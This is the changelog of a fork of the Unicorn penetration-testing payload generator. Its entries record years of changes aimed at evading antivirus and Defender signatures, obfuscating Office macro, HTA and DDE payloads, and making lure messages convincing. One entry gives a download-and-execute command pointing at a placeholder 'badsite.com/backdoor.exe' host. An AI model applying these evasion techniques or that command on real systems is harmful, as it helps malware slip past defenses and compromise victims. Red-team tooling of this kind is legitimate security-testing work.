forked from trustedsec/unicorn
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CHANGELOG.txt
378 lines (273 loc) · 10.4 KB
/
CHANGELOG.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
~~~~~~~~~~~~~~~~
version 3.2.5
~~~~~~~~~~~~~~~~
* add byte splitting based on defender sigs
~~~~~~~~~~~~~~~~
version 3.2.4
~~~~~~~~~~~~~~~~
* added randomized integer lengths for dynamic byte ranges
~~~~~~~~~~~~~~~~
version 3.2.3
~~~~~~~~~~~~~~~~
* create longer byte arrays for defender rule bypass
~~~~~~~~~~~~~~~~
version 3.2.2
~~~~~~~~~~~~~~~~
* add python 3 compatibility
* remove filewrite variable and move to function write_file for SettingContent-ms
~~~~~~~~~~~~~~~~
version 3.2.1
~~~~~~~~~~~~~~~~
* update blog post and update readme
* update unicorn metasploit meterpreter payload to remove a CLD from beginning of shellcode which was being snagged by defender
~~~~~~~~~~~~~~~~
version 3.2
~~~~~~~~~~~~~~~~
* added new SettingContent-ms from enigma0x3 to Unicorn supports cobalt strike, metasploit, and custom shellcode
* remove %windir%, getting flagged by AV
~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~
* added secondary parse for older versions of cobalt strike
* added better error handling around list index out of range
* modified lower stack size due to powershell crashing sometimes, seems to be more stable now
~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~
* added ability to import cobalt strike C# stager and use that as a unicorn based attack
* added ability to import any shellcode directly into unicorn
* remove cmd.exe depend on WSCRIPT.Shell - not needed and increases cmd line length limit
* added ability to use custom shellcode with cobalt strike and shellcode methods for hta
* added ability to use custom shellcode with cobalt strike and shellcode methods for macro
* fixed line continuation error for long payloads when using excel (can't have long strings with & plus 25)
* add hiding of powershell name in hta file
~~~~~~~~~~~~~~~~
version 2.14
~~~~~~~~~~~~~~~~
* fix replace for /C that broke syntax for macros
~~~~~~~~~~~~~~~~
version 2.13
~~~~~~~~~~~~~~~~
* added switches on command lines for evasion
~~~~~~~~~~~~~~~~
version 2.12
~~~~~~~~~~~~~~~~
* added better handling for stack size detection on signatures - should no longer get flagged
~~~~~~~~~~~~~~~~
version 2.11
~~~~~~~~~~~~~~~~
* reduce filesize by removing shikata from encoding on payload generation
* add lenght limit size description on error on size
~~~~~~~~~~~~~~~~
version 2.10
~~~~~~~~~~~~~~~~
* added IEX and formula evasion as DDE methods and split out attack vector into 3 different components
* rewrote the download/exec payload so that it is custom shellcode that is manually patched with URL instead of metasploit one
* numerous other enhancements and fixes
~~~~~~~~~~~~~~~~
version 2.9.3
~~~~~~~~~~~~~~~~
* add better obfsucation on dde
~~~~~~~~~~~~~~~~
version 2.9.2
~~~~~~~~~~~~~~~~
* fix compatibility with windows 7 - for some reason -e''c in Windows 7 breaks Unicorn whereas works fine within Windows 10
~~~~~~~~~~~~~~~~
version 2.9.1
~~~~~~~~~~~~~~~~
* fix typo in powershell_command
* added better obfsucation of path and code (thanks Will)
~~~~~~~~~~~~~~~~
version 2.9
~~~~~~~~~~~~~~~~
* added a sys.exit() on length amount
* added new dde code exec through unicorn from sensepost
* fixed some wording in help menu
* general code cleanup
* slimmed down command line some more with seperator reduction and variable name size length
~~~~~~~~~~~~~~~~
version 2.8.2
~~~~~~~~~~~~~~~~
* added better handling of randomized variable names
* removed an extra semicolon
* fixed typo
* added count length for payload to ensure payload doesn't increase past max command line length of 8191
* fixed minor casing on Start-Sleep
~~~~~~~~~~~~~~~~
version 2.8.1
~~~~~~~~~~~~~~~~
* remove static variables - flagged by A/V
~~~~~~~~~~~~~~~~
version 2.8
~~~~~~~~~~~~~~~~
* shortens length and obfuscation of unicorn command
* removed direct -ec from powershell command
~~~~~~~~~~~~~~~~
version 2.7.5
~~~~~~~~~~~~~~~~
* fix missing powershell call (thanks matterpreter)
* improved additional wording on error message for macros
~~~~~~~~~~~~~~~~
version 2.7.4
~~~~~~~~~~~~~~~~
* add a more real corrupt message from excel macro injection
~~~~~~~~~~~~~~~~
version 2.7.3
~~~~~~~~~~~~~~~~
* fixed powershell injection obfuscation in macro injection - that was a pain :P
* added bolt red to macro AutoOpen/Auto_Open difference based on version number
* fixed powershell injection length issues by skimming down the chunking of powershell commands
~~~~~~~~~~~~~~~~
verison 2.7.2
~~~~~~~~~~~~~~~~
* random cleanup
~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~
* fixed merge issue
~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~
* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names
~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~
* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability
~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~
* minor string format cleanup
* pep8 formatting
~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~
* complete rehaul on macro injection - adds heavy obfsucation through the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code
~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* added shortened version of -window hidden to -w 1 which is shorthand for window hidden
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* added shortened method for obfsucation
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfsucation that should not get picked up anymore and removes the need for -e or -ec
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* change auto_open to autopen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* added enablestageencoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added --smallest flag to msfvenom generate which compacts shellcode to smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now through off sigs if contained inside of a file.
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn